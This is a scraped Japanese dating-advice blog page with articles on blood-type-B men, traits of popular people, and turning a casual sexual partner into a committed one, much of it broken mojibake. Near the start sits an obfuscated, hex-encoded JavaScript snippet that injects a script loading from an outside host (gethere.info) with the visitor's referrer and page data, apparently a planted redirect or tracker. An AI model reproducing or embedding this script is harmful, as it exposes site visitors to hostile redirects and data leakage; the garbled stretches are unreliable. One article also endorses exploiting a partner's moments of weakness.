c�?a�sa??a��a??a�?a?�a��a??c�Y??�a?�a??a�Sa??a?�a?�a?�a�?a??a??a??a?�a?Ye�?a??a?Ya?�a?�a��a?�a?�a?�a�?c�?a�Sa?�a?�a??a?�a?�a��e�?c�?a?�a��a??a?�a�?a?sa�?a??a?�a??a��a?�e??a?�a??a?�a?�a??a?�a?�a?�a�Sa?�a?�a??a?�a��c?�c�?a?�e�?a�?a��a�?a?�a?�a?�a?�a?Sa??a??a?�a��a?�i??a???��a��a??a��a??c��?��a?�?�?a???��c��c�?a�sa?�a?Ya?�a???�?a?�a?�a?�e��e?�a?�a?�a�Sa??a?�a��a��

e?�a?�a?�a??a??a??a��a??a�?

a�???�e?�a??a��a?�e��a??a��a?�a??a??a?�a??a?�a��e�?a?�??�a??a??a??a?�a?Za?�a??a��a??a��a?�a��e��a??c�?a??a?�?��a?�a?�a?�a��?�?a�?a??e��a??a??a?�a�?a�?a??a??a??a?�a��a?�a??a?�a?�a��a??a?�a?�a??a�?a?�a??a??a??a��a?�a?�a�?a�?a?Sa?�a??a?Ya?�a?�a��a?�a??a?�a�?a??e��a?Ya??a?�a�Sa??a?�a��a��

?�?a�?c?�?��a?�a��a?�a??a?�a�Sa??a?�a��a?�a?�a?�a?�a??a?�a��e?�a?�a?�a??a??a??a??a??a��a??a?�a?�a?�a?�a?�a?�a?�a��a?�a?�a?�a��

a��a?�a��a???��a??c�?a�sc�Y??�a??a��a??a??a?�a??a?�a?�a??a??a��a?�e?�a��e��a?�a��a?�a??a��a?�a?Ya�Sa�?a?�a??a??a?�a??a?Ya?�a��a??a?�a??a?�a�?a�??Z�a?�a��?��a��a?�a??a??a��a??a��a?�a?�???a??a?�a?Ya??a??a?�a?�a?�a�?a?�i?Ya???��a��a??a??a??a?�a?�a?�a��a???��a��??�??�?�Ya?�a?�a��c��?��a?�c�?a�se????�a��?S�a??a??a?sa?�a?�a��

a?�a�?a??aZYa��a?�c�?a�sa??NG

a??a??a��e�?a?�a?�e�?a?�c??a��a?�a�?a?�a??e�?a??a?�a?�a��?�?a?�1c�?????�?a?�a?�a?�a?�a?�a?�a??a�?a??a�?a??a��a?�a��a??a??a??e�?a?�a?�???e�?a?�a�?a�?a??a??a?�a?�a��e?�a�?a�?a?Y?��a??a?�a??a?�a??a??a��a?�a?�a??a?�a�?a�?a??a?�a?�a?�a?�a??a?�a?�a?�a��

a�?a��a�?e??a????�a?�a��a?sa??a??a?�a�Sa??a?�a?�a?�a�?a??a??a??a?�a?�a��e�?a?�a��e�?a?�a?�???e�?a?�c�?e?�a?�a??a??a???�?a?�a?�?��???a??a?�a??a??a?�a?�a?Ya�Se????�a???s�a??a??a??a?Ya�Sa?�a?�a?�a?Ya��a?�a??a?�a??a??a��a?�a��a?�a??a?�a?�a?�a?�a?�a�?a??a?�a?�a?�a?�a??a?�a?�a?�a?�i??e�?a?�a????�a?�a?�a??a??a??a??a??c�?a�sa�????a?�a??a?�a??c�Y??�a��e�?a�?a?�a��a�Ya?�a?�a?�a?Ya��a��a??c?�???a?�c�?e?�a��?��a?�a??aZYa��a?�e�?a�sa?�a��a?�a?�a??a��a?�a?�a??a�Ya??a�sa?�a?�a?�a?�a��

a?�a??a?Ya??a??a??a?�a�??�?a?�a??a??a?�a�?a??a?�a?�a?�a��a?�a??a??a�????a?Ya��a??a??a??a?�a??a?Ya??c�?a�sa?�a?Ya?�a???�?a?�a??a?sa?�a?�a��

a??a??a�?

a???��a??c�?a�sa??a??a�?a?�c??a�Ycs�a???��a?�c��a��a?�a?�a??a?�a?�a?�a?�a??a?Ya?�a??a??a��a??a?�a?Y?�?a??c�Y??�a??e�?e�?a??a??a�Sa??a?�a��

a??a?�a?�a?�a?�a??a?�a?�?��e�?a�?a��a?�a??a?�a�?a?�a?�a??a??a??a��a?S?��a??a��a??a?�a?�a?�a��e�?a??a??a?�a��a?�a??a?�a??a?�a?�a?�?��a???S?a?�a��a?�a?�a??a?�a�?a��a?�a??a?�a�Sa??e�?a?Ya?�a??a?�a��

c��a��a?�a?�a��a?�a??a?�a�?a??a�?a��a??a?�a?Ye�?a??a??a�????a?�a�?a�?a�Sa?�?��e�?a�Sa??a�????a?�a�?c?Ye??c��a??c��?��a?�a?�a�?a?�a???��a��a?�a??a?Ya??c�?a�sa?�a?Ya?�a???�?a?�a?�a?�a??a?sa??a�?e�?a?�a��a��e��a?�a�?c�?a?�a?�a??a��a??a�?a?�a?�a??a?�a?�a?�a?�a��var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

B型男性の特徴

あなたのまわりにB型の男性はいますか?

今、気になっている男性や好きな男性、告白してきた男性やこれから告白しようとしている男性がB型という方もいるのではないでしょうか?

A型、B型、O型、AB型とありますがあなたは、B型男性にどのようなイメージをもっていますか?

B型男性の事をもっと知りたいと思っている女性の為に、B型男性の性格の特徴や恋愛傾向などについて、ご紹介していきますので参考にしてみてください!

B型男性の性格の特徴

『マイペース』

誰かに合わせて行動するよりも、自分のペースを崩さず行動するB型男性を周りはマイペースだと感じることが多いようです。

興味のあるものにはどんどんはまっていくけど、興味のないものには見向きもしない。

他人に自分のペースを崩されることなどに、とても強い抵抗をもっている人が多いようです。

『リーダ的存在』

何事も一回決断すると、決めた目標に向かってまっすぐ突き進み頑張るタイプです。

しかし、自分のやることだけが正しいと信じて、客観的に物事を考えずに行動してしまうところがあります。

目標に向かってひたすら頑張るところから、周りの人に頼りにされリーダー的存在になる事もおおいようです。

『好奇心旺盛』

常に周りで起こる楽しそうな事や、面白そうな事に敏感でとにかく自分も試してみたい!という気持ちをもっている。

仕事やプライベートでいろいろなことに興味をもっているが、熱しやすく冷めやすいというところもある。

何事に対しても浅く深くというよりも広く浅くというタイプ。

『自己中』

自分の興味のある事には突き進んでしまう所があり、ついつい自分の気持ちを優先してしまい、あまり他人の気持ちを考えない。と相手に思わせてしまうことが多いようです。

B型男性は自分の気持ちに素直で、興味のあるものに対して行動してしまうので、結果的に自分の好きなことをしたい=周りを見ず自分のことばかり考えている人という風に見られる事が多い傾向にあります。

『お調子者』

多少調子に乗ってしまうところがあるかもしれませんが、おだてられるとついついその気になってしまうのがB型男性です。

素直な人だからそこ嬉しいことは嬉しい!楽しいものは楽しい!など気持ちが少しオーバーになってしまうところもあります。

ひょうきんな面もあるので、その場の雰囲気を盛り上げるのも上手で、そんなところも頼りにされる理由の1つでもあります。

『表裏がない』

思ったことを考えずにすぐ口に出してしまう性格のため、言葉も比較的ストレートなので、厳しいことも平然と言ってしまうところがあります。

しかし、思っていることや考えをていることが表に出やすいB型男性は、どちらかというとコミュニケーションがとりやすいタイプが多い傾向にあります。

B型男性の恋愛傾向

『好きな女性に一貫性がない』

固定概念がないB型男性は、こういう女性が好きなタイプだ!というこだわりがなく、その時好きになった女性が好みのタイプで、好きになる女性に一貫性がありません。

恋愛の仕方も同じく一貫性がないため、急に尽くしたり、尽くされたかったりなどその時の気分によって恋愛を楽しむ傾向があります。

『アプローチがすごい』

B型男性は嘘をつけない素直な性格をしているため、心の中で思っていることを、そのまま行動や言動に表すので恋愛に関してもいつも直球勝負です!

好きになると情熱的にアプローチをするタイプで、好きになったらとことん相手を想いやる人が多いようですが、その一方で熱しやすく冷めやすいという一面もあるようです。

『嫉妬心を抱くことが多い』

好きになった相手に対してはかなり嫉妬が強くなる傾向があるようです。

彼女が異性と話している姿を見るだけで嫉妬を覚え、彼女と離れているときも「他の男と話してるんじゃないか?」など考えてしまい全く何も手につかなくなってしまう事もあります。

しかし、カッコ悪いところをみせたくないあまり嫉妬していても、その姿を見せようとしないのがB型男性です。

B型男性から愛される秘訣

『お互いの時間やペースを大事にできる人』

マイペースなB型男性は、常に自分の時間やペースを一番に考え自分を中心に行動している人が多いです。

そのため、恋愛したからと言って相手のペースにあわせたり、無理をしてまで相手に付き合うということができません。

なので、今までのライフスタイルを崩したり、女性に崩されたりすることをとても嫌います。

お互い自分のペースを乱さず、尊重し合える。

そのように相手の女性も自分をしっかり持っているといいでしょう。

『自分の良さをわかってくれる人』

自分の良さを発見してくれ、わかりやすく褒めてくれる人が好きです。

自分が良いと思うものを理解して、共感してくれる女性を好きになっていき、自分を認めてくれる考え方がB型男性には魅力に映ります!

いつでも相手を尊重すること、相手の個性を活かすことを心がけながら行動するといいでしょう。

『自由にしてくれる人』

自由奔放な一面を持つB型男性は、束縛されることをとても嫌います。

どんなに自由な行動をとっても、何も言わずそれを見守って一緒にいてくれる女性を求める傾向があります。

しかし、寂しがりやな一面もあるため相手の女性が離れていきそうになると、慌てて追いかけていきます。

相手のやりたい事を支えられる大きな心をもって、見守ることができるといいでしょう。

B型の芸能人

芸能人でいうと、明石家さんまさんや松本人志さん、亀梨和也さん、堂本光一さん、イチローさん、羽生結弦さんなどがB型のようです。

他人と同じことが嫌いで、他人と違うことをやりたがるタイプが多く、好奇心旺盛なので、好きなことには一心不乱にのめり込む傾向があるため、スポーツでも個人種目での名選手が多いですね!

まとめ

B型男性は自由奔放でマイペースな人が多い傾向にあるのでまずは、好きな女性のタイプをリサーチして少しでもその好きな女性のタイプに近づくように努力するといいですね。

B型男性と接するときは、相手のことを考えペースを乱さないように注意しながら、お母さんのように大きな気持ちで見守ることが大切だと思います。

モテ男とモテ女に共通する5つの共通点

世の中は不平等なもので、異性に人気のある人とそうでない人。分かれていますよね。

その人がいるだけで男女問わず、周りに人だかりができていたり、飲み会の席などで会話を楽しみながら好印象を振りまく男女が居たり。

そこで今回は、モテ男とモテ女に共通するモテポイントを外見以外の部分でじっくり探っていきたいと思います。これで貴方も明日からモテ男、モテ女になれるでしょう。

気遣いのできる男女

これは老若男女問わず、好印象にはなりますよね。これがまた、気の遣い方もさまざまでやりすぎてしまうと計算高く思われたりする場合があるので、あくまで自然に振る舞うことがポイントとなってきますよね。
例えば「食事に行った際に取り皿に取り分ける」は定番です。

そのワンランク上を目指すならさりげない手土産です。待ち合わせの場所に行った際に、いつも飲んでいる飲み物をサッと渡したり、煙草を吸う方なら銘柄を把握しといて渡すなどですね。ただ、押し付けがましく渡すと逆に印象が悪いので、「これ、好きだった?」くらいの渡し方にしておきましょう。

その他だと、男性なら女性が通る際にドアをさり気なく開けてあげたり、女性なら男性がお会計を済ましてくれている間にエレベーターのボタンを押しておく。などですかね。
あくまで自然に相手を思っての行動をするということで気の遣える男性、女性になれるのではないでしょうか。

聞き上手な男女

自分勝手に話をすり替えたり、自分の話ばっかりする男性、女性は少なくはないですよね。
つい楽しくなってしまって自分の話ばかりに夢中になってしまう。そんな時は誰にでもありますが、モテ男、モテ女はとっても聞き上手な気がします。

常に相手に耳を傾けて自分の話は二の次のような印象です。そういった男性、女性は落ち着いた印象にもなりとても話しやすかったりしますよね。聞くだけではなく絶妙なタイミングで相槌を打ち相手の方も話していてとても気持ちのいいような空気感を作ってくれたり、時には味方になってくれたり、間違っていることは間違っていると、素直に意見をくれたり。

ついついまた話を聞いてほしくなるような聞き上手な男性、女性はモテていますよね。それもまた、自然に聞き上手なのでしょう。決してモテようとしてそうなった訳ではなさそうですよね。「自然に聞き上手」になれば自然に好印象になっているのかもしれませんね。

素直で明るい印象の男女

暗い印象の男女には、あまり話しかけようとは思いませんよね?共通の趣味などがあれば別ですが、基本的には気さくで素直な明るい性格の男性、女性の周りに人が多い気がします。
共通するのは、どちらも男女問わずモテている。ということでしょうか。異性からはモテるけど、同性からは人気なしというパターンのモテは性的対象になっているだけで、中身は見ていなくて「美人だな~」「男前だな~」という外見だけの判断になるので、芸能人と同じでブームが過ぎ去れば相手にされていないパターンがほとんどです。

それに外見ばかりを磨くのも、いいですが自分らしさがなくなってしまっていることが多い気がします。やはり中身をしっかり見つめ直して「自分らしくモテる」というのが理想ではないでしょうか。
意識して自分らしく明るく素直に過ごすだけでも、自然に周りに人は集まっていますし笑顔も増えていることでしょう。結果、モテる男性、女性に1歩近づいているのではないでしょうか。

噂や陰口を気にしない男女

女性は特にうわさ話や陰口で、1日カフェに居ることもあるくらい大好物なのですが、男性はそういう、うわさ話や陰口をよく思わない方の方が多いですよね。ヒソヒソと話したりして悪い印象しかありません。うわさ話に振り回される女性は、自分に自信がない方が多いです。

誰かの意見に共感などしていないのに、グループからの仲間外れを恐れていたりしてうわさ話にのっかってしまうのです。また、男性でも女性のうわさ話に左右されてします方も中には、居ますよね。「そんな奴だったのか。俺も喋らないでおこう」など男性らしくありませんよね。

自分の目で、自分の耳で聞いたことでもないことを、「あーだ、こーだ」という男女は嫌われやすくモテる訳がありません。もしも、そんなうわさ話や陰口に遭遇してしまったらモテ男、モテ女などは「あの人そういうとこあったんですね。知らなかったですー」などとと軽く流していますよね。うわさ話や陰口には深入りは禁物です。

何事もポジティブな男女

基本的にプライベートでも仕事でも、明るく過ごせているのがモテ男、モテ女。たまに居ますよね。仕事で何を頼んでも「えー私いまこっちやってるのにー」など文句ばかり言っている社員さん。頼んだ方もそれを見ている職場の雰囲気も悪くなっちゃいますよね。

モテる男性、女性なら「今やってる、これが終わり次第すぐに取り掛かりますね」などとニコニコと返しているはずです。どんな時も周りの雰囲気も考えて笑顔で対応して、声色までも印象のいい人が自然とモテているのではないでしょうか。

誰でも悩んだり、苦しいこともあります。辛すぎて何もしたくない。なんて時も多いです。人間ですから当たり前です。だからといって時間は止まる訳でもなく進んでいくのです。

それぞれ同じ1時間なら明るく前向きな1時間の方がいいと思いませんか?悩んでいたって何も解決しないなら笑って過ごしているうちに「あれ?私何に悩んでいたんだっけ?」と忘れているものですよね。そんな毎日なら明るく素直な自分に自然と自信を持って過ごせていて、周りにも人が集まってくるような毎日に、きっとなっているはずです。

まとめ

どうでしたか?この5つを考えてみて気づいた方も多いと思いますが、モテる男性、女性は常に周りに思いやりを持っていたり、素直で明るく前向きな方達だということです。

周りに気を遣いながらも、自分をしっかり見つめて毎日を明るく生きているだけで人から自然と好印象を抱かれているのです。「モテたい!」そう思うよりかは、周りに目を向け、自分を見つめ、素直に明るく前向きに生きることできっと今よりもずっとモテている自分になれているのではないでしょうか。

セフレから恋人になるための試すべき2つのコトと4つの注意点

カラダだけの関係だったはずなのに…気付いたら本気で好きになってしまった…という経験がある方も多いのではないでしょうか?最初は割り切っていた関係でも好意が生まれると、体を重ねても虚しい気持ちになってしまいます。

セフレから本命にはなれないとよく言われますが、それはいったい何故なのか。

今回は、セフレが本命になれない理由は?本命になるにはどうしたらいいのかをご紹介します。

セフレは本命になれない?

そもそもセフレとは…

そもそもセフレとは、正式に付き合ってはいないのに継続的にカラダの関係がある男女の関係のことを指します。

通常の恋人同士のように、「私たちは好き同士なので、他人との関係は持ちません」というような一種の契約を結ばず、「私たちは好き同士ではないので、他人との関係を持ってもよい」という、恋人同士とはちがう”契約”を結んでいるのです。

カラダの関係はありながら、心や体への独占権を持たないというのもセフレのルールのうちに入ります。このルールはある意味画期的なルールでもありますが、どちらか一方がルール違反をおかしてしまったり、勘違いをしてしまうと一気に泥沼化してしまいます。

セフレはただの性欲を満たすためだけの相手ではない?

「セフレ=性欲を満たすためだけの相手」という考えが、ルール違反や勘違いを起こす原因になっています。性欲を満たしたいからセフレがいるんじゃないの?と思う人が大半だと思いますが、本来カラダの関係だけであったはずのセフレを好きになってしまったのには「性欲を満たす」以外の何かの感情があったからです。

よって、性欲以外の何かを感じてしまったときにその勘違いが生まれてしまうのです。
例えば、『ホテルなどには行かず食事にだけ誘われた』や、『相談に親身にのってくれた』などが挙げられます。

こういった経緯を経て、「もしかしてこの人は、自分のことを想っているんじゃないか…」という思いを芽生えさせてしまい、彼女にとって自分は特別な存在なのではないか…と思わせてしまうのです。

これは男女が逆転しても起こりうることです。

セフレからの優しさを愛という勘違い

上記で挙げたような点から、セフレから向けられた優しさをだと勘違いしてはいけません。
セフレの存在は「優しい自分」に酔いしれたり、カラダだけの相手なのに自分にしっぽを振って求めてくる相手を見たり、いつもの相手とは違う存在の自分を褒めてもらおうなどと、性欲以外の関係も満たそうとしている可能性があります。

それは愛ではなく、ほぼ自慰行為に近いと言えるでしょう。女性はセフレという関係を通して寂しさを埋め、性欲以外の部分も慰めているのです。その優しさや行動は、あなたを想っての行為ではなく、自分自身のためなのです。

セフレから本命に近づくためにしてはいけないこと

それじゃあ、セフレから本命に昇格することはできないのか!とお思いの方もいらっしゃいますよね。
やはり、カラダだけの関係として始めてしまうとこれがなかなか難題なのです。

ですが、どうしてもなりたいという方のために注意すべきポイントをご紹介します。

束縛をしてはいけない

「昨日何をしていたの?」「昨日連絡をくれるって言ってたのになんで電話をしてくれないの?」などゆるいものでも束縛は絶対にNGです。
本命に近づくどころか、むしろ遠ざかってしまいます。

2人の関係が進むにつれて、ゆるくとも相手を縛るような言動は相手にとって重荷になっていきます。
理由はもちろん、『2人は恋人関係ではない』からです。

「好き」や、「愛してる」は絶対にNG

これも、上記の束縛をしてはいけないと同じ理由です。

「好き」や、「愛してる」といわれても相手はどう反応していいか困ってしまいます。
想いを伝えたいという気持ちもわかりますが、このような言葉は上手くいった時まで心に留めておくのがベストです。

自分から連絡をしない

よほどの用事がない限りは、相手からの連絡を待ち続けるのもよい方法です。
もちろん、相手のSNSにいいねをしたりコメントをするのも避けましょう。

自分から連絡を取って、関係を持ってしまう時点であなたは都合のいい相手に成り下がってしまっているのです。
一度こう思われてしまうと、「この人はいつでも会えるから、今は放っておいてもいいや」と思われるようになってしまいます。

相手に立場や関係の確認をしない

この関係って何なの?」や、「俺たち付き合ってないなら何?」などと自分たちの立場や関係を相手に確認するのは絶対にしてはいけません。

相手は少なからず「ただのセフレだよ」と思っているはずです。
セ〇レの関係の相手に、立場や関係を問いただすのはご法度なのです。

相手が答えにくいうえに、自分自身が安心できるような言葉や、返答を求めてしまいいいことが一つもないからです。
仮に、言葉で安心することができても行動に見えてこなければ、あなたはまた不安になってしまうでしょう。

どうしても本命になりたいというために

相手が弱っているときにはそばにいる

注意すべきポイントで、自分から連絡をしないとご紹介をしましたが相手が弱っているときは別です。

・彼女がひどく落ち込んでいるとき
・彼女が風邪で寝込んでいるとき
・彼女が本命にフラれてしまったとき

などには、彼女のそばに寄り添い「いつだってそばにいるよ」という思いを言葉には出さず雰囲気でアピールするのです。
弱っている彼女からすれば、あなたの優しさや、男らしさ、力強さは輝いて見えるでしょう。

「相手の弱みにつけこむなんて…」と思う方もいるかもしれませんが、セフレから本命への道のりは一筋縄ではいきません。こういったかけひきも必要なのです。

いざという時に頼れる存在でいる

女性は、何かのトラブルに直面した時にオロオロと慌ててしまう人がほとんどです。そんないざという時に頼れる存在でいましょう。
女性は男らしく、自分を守ってくれる、頼れる男性に憧れを持ち惹かれる傾向にあります。
いざという時こそ動じず、どしっと構えてる姿はあなたの好感度をぐっと上げてくれるでしょう。

この人がいてよかった」、「この人なら安心できる」と思わせることができれば本命にぐっと近づくことができます。

まとめ

セフレという関係から本命になり、正式な恋人関係になるのは容易いことではありません。時間も労力も使います。

案外当たり前の行動すぎて、拍子抜けしてしまった方もいるかもしれません。ですが、小さなことからこつこつと行うことがかけひきのポイントなんです。どうしても現状を打破したいと思うのであれば、小さなことからこつこつと行ってみてくださいね。

a??c?�a��a?�a��e��a?Ya???��a??a�?a??a??a?�a?Ya�?a?�a?�e�?a??7a?�a?�a�?a??

a???��a??a�?a??a??a?�a?�a??a?�a?�a?�a?Ya��a?�a?�a?�a?�a�?a?�i?Y

a�sa??a?�c��?��a?????a?�?��a??a?�a?�a��a??a?�a?�a??a?Y?��a??a��e�??�?a?�a��a?Ya�?a?�a�Sa�za??a??c?�a��a?�c?�c��a?�a�?a??c?�a��a?�a��e��a?Ya?Sa?�a???��a??a�?a??a??a?�a?Ya�?a?�a?�e�?a??a�?a??a��7a?�a?�c??a��a?�a??a?�a��

c��a��a??a��a??e��a?�a?�a��a?Ya�?a�?a??c?�a��a??e?za??a?�??�aS?a?�a?�a��???e?za?�e�?a?�a?�a?�a�?a???��a?�a?�a?�a�?a��a�?a??a??a?�a?�a??a?�a?�a?�a��

a?Ya?�a??a??a??a��a?�e�?c��a??a???�Ya?�i?�i?�i??


a?Ya?�a??a??a??a��a��a?�a�?cY?a?�a?�a��a?�a?�i?Ya?Ya?�a??a??a??a��a??a??e�?a?�a??a??a?Ye?�a��a��a?�a��a??a?�a??a?�a?�a???�?a��?S�a??aS??z?a?�a?�a??a?�a?�a��

a?�a??a�Sc�??��a?�a???��a??a??a?Ye?�a��a��a?�a��a??a�?e�?c��a??c�??��a?�a???��a?�a???�?a��?S�a?�a?�a��a?�a??a??a�????a��a??a?�a?�a?�a??a?�a?�a��

c?Ya??a��a?�a??a?�a??a?�a�?e��a?�a?�a?�a��?��a?�c�??��a?�a�?a��a�?a??a??a??a��c��a?�a�?a��a?Ya??a��a??a?�a?�a?�a��c?Ya??a��a?�a??a?�a??a??a?�a��a�?a��a�?a??a??a??a��c��a?�a??a?�a??a?Ya�??�?a??cs�a?�e?�a��a??e??a?�a��a?�a?�a?�a?�a??a?�a?�a?�a��

a?�a?�a??e�?e�?a??a??a��a??a??a?�a�?a?�a??a�Se??e??a?�c�??��a?�e??a��a��c?Ya??a?�a?�a??a?�a??e?�a�??�Ya��e�sa??a��a�?a�?a?�a??a??a?�e�?e�?a��c?�a?�a�?a?�a?�a??a?�a??a?�a��e�?c��a?�a?�a��a?�a??a??e�?e�?a?�a?�a��

a?Ya?�a?�a?�a��a?�a��a?�a��c?Ya??a�?a?�e�?a?�a??a?�a?�a�?a?�a?�a??a?�a�Sa??a?�a��a��a?�a??a??a?�a��c?Ya??a��a?�a??e?�a��a???�?a??cs�a?�e??a?�a��a?�a?�e�?a��a�?a?�a?�a?�a?�a??a?�a?�a?�a��

a�?a��a?�e?�a?�a��??�c�?a?�a��a??a?se��a??a??a��i??

a?Ya?�a??a??a??a��a??a??a?Ya��a?�a?�a?�a??a�?a?se��a��a??a??a?�a��a?Sa?�a??a�?a��a?�e?�a?�a????�aS?a?�a?�a��

a�?a��a?�e?�a?�a??a??c�??��a?�e?�a??a?Ye?�e��a��a??a?�a??a??c?�a�Se?�a?�a?�a??a?�a?�a��a�?a��a?�e?�a?�a��e??a?�a?�a??a?�a�?e�?a?�a?�e��a��e?za?�a?�a??a�?a?�a?�a��a??a?�a?�?�Ye�sa��c�??��a?�a???��a?�a?Za??a��a?�a??a??a�????a??a?�a��

e�?a?�a?�e��a��e?za?�a?�a??a�?a?�a?�a��a??a?�a??e�?c��a??e��a?�a?Ya??a??a��a?�a??a??e��a?�a??c?�a??a?�a?�a��a?�a��e��a?�a�z?��a??a?�a??a�?a?�a?Sa?�a?sa??2a??a?�e�?e�?a??c?�a??a�Sa??a?�a��

a??a?�a?Ya�?a�?e�?a?�a?�e��a��e?za?�a?�a??a�?a?�a?�a��a??a?�a?�?�Ye�sa��a?Za??a��a�?a��a�?a��a?�e?�a?�a????�aS?a??a?�a?�a?�a��

a�?e??a��a??a?�a?sa?�a?sa?�e��a?�a?�a��a?�a??i??


a�?a��a?�e?�a?�a?�c�sa?�a?�a?se��a?�?��a?�a??a??a��a?�a�?a?�a??a�?a?�a�?e??a??a?�a�Sa??a?�a��

a�?e??a??a??c�??��a?�a?�a??a��a?�a?�?�?a�?a��a�?a?�a?�a�?c?�e�?a?�a��a�?a?�a?�e�?a��a�?a?�a?�e��a��e??a??a?�a??a?�a?�a��

a�?e??a��a?�a��a?�a??a?�c�??��a?�a???��a??i??a?�a?�a??a??e�?a?�a?�a?�a??a��c?�e�?a?�a?�a??a�?a?�a?�a��a��c�?a?�a?�a??a��a?�a?�?�?a�?a?�a??a�?a��a??a?�a��i?�a??c�??�?e�?a?�a?�a?�a?�a?�?�?a?�a�?a?�a?�a??a�Sa??a?�a��

a�?e??a?�a?�aS�a??a??a?�a�?a??c�??�?e�?a?�a?�a?�a?�a?�e�?a?�a��c?�e�?a?�a?�a??a�?a?�a?�a��a???�?a�?a?�a��a?�a??a??a�????a��c�?a?�a?�a��e??e??cs�a?�a??a??a??a�?c�??�?e�?a?�a?�a?�a?�a?�?�?a�?a?�a��a?�a??a??a�????a��a?Ya�?a?�a?�a??e�?e�?a?�a��c?�a??a?�a??a??a�????a??a?�a��

a�?e??a?�a�?a?�a??a?�a??a��a?�e��a?�a�?a??a��1a�?i?z2a�?a??a��a?�a??a?�??�a��a?�a�?a?�a??a��a?�c�??��a?�e��a?�a?�a��a��a?�a?�a??a?�a?�a��a??a?�a?Ya�?a?�c�??��a?�c��a��a�?a??e��a��a?�a??a??a?�a??a?sa??a��e?�a?�a?�a�?a�?a��a?�a??a�?a�?a?�a?�c??a��a?�a?Ya�?a��a?�e?�a?�a��??�c�?a?�a��a?�a??a??a?�e�?a?�a??a�Sa??a?�a��????�?a?�a??a??c�?a??a?�a?sa�?a��a�sc�?a?�e?Za?Za??a?�a?�a??a??a�?a?�a�?a??a??a��a��a??a��a?�a??a?�a?�a��

a�sc�?a?�a?�a?Za��a??a�?a?�a??a��a?�a??a??a�Sa??a?�a��a??a?Ya?sa??a??a??a??a�?a?�a??a?�a??a?sa???�?a��a?�a?�a?�a?Ya��e��a��e?za?�a?�a?�a��a?�a?�c��a�?a�?a?�a?�a??a?�a??a?�a��1a?�a�?a??a??a?�a??a��a??a?�a�?a?�a?�?�?e�?a?�a??a??a��a?se��a��a?�a??a?�a��a?�a��

a??c?�?Z?e��aS??z?a��??�c�?a?�a?�a???�?a��???a?Ya?�a��

a??c?�?Z?e��aS??z?a??a??a�??Z?e��a�z?��a??a�sa?�a??a?�a?�a??a?�a?�a??a??a?�a??a�Sa��a?�a?�aS??z?a?�a?�a??a?�a?�a��

?Z?e��a?�a��a�?a??a??c?�?Z?e��a??a?�a?�e?�e��e�sa�Sa�?a??c?�a??a��a?�a?�?��a?�a??a?�a��a��a?�a��e?Ya?�a??a?�e??a??a?sa??a?�a??a?Ya�?a?�?Z?e��a?�a��a?�e�?a??a?�a��a�?a?�a?�a??a?�a�Sa??a?�a��a��

a?Ya?�????��a��a?�a��a�?a?�e?�e��a?�a??a?�a??a?Ya��a?�a?�a??a?�a??a?�a?�a?�a��e�?e�?a??a?�a??a�z?��a?�a?�a��a?�a?�a?�a??a?�a�Sa??a?�a��a��

a�z?��a��e�?a?�a��a?�a??a?�e�?c��a??a???�?a��?S�a??a??e?�a�?a�?a?�a?�a??a?�a��a??a?�a?Ya�?a�?e�?a?�?Z?e��a��?��a�sa??a?�a��a?�a??a��a??a??a?�a?�a?Sa?�a??a??a?�a?�a??a??a?�a��a?�a��

a???�?a?�e?�a��?��a��??�c�?a?�a�?a???�?a��?S�a?�a?�a��


a??c?�?Z?e��aS??z?a??a??a��a?�a?�a?�a?Ya??a�?a??a�?a�?a�Sa��a?�a??a�?e�Ya?�a�?a?�a??a?�a?�c�??��a?�a???��a?�a???�?a��?S�a?�a?�a��aS??z?a??a?�a��a��a?�a?�a�?a???�?a?�e?�a��?��a??a?�a?�a��a?�a??a?�a�Sa??a?�a��

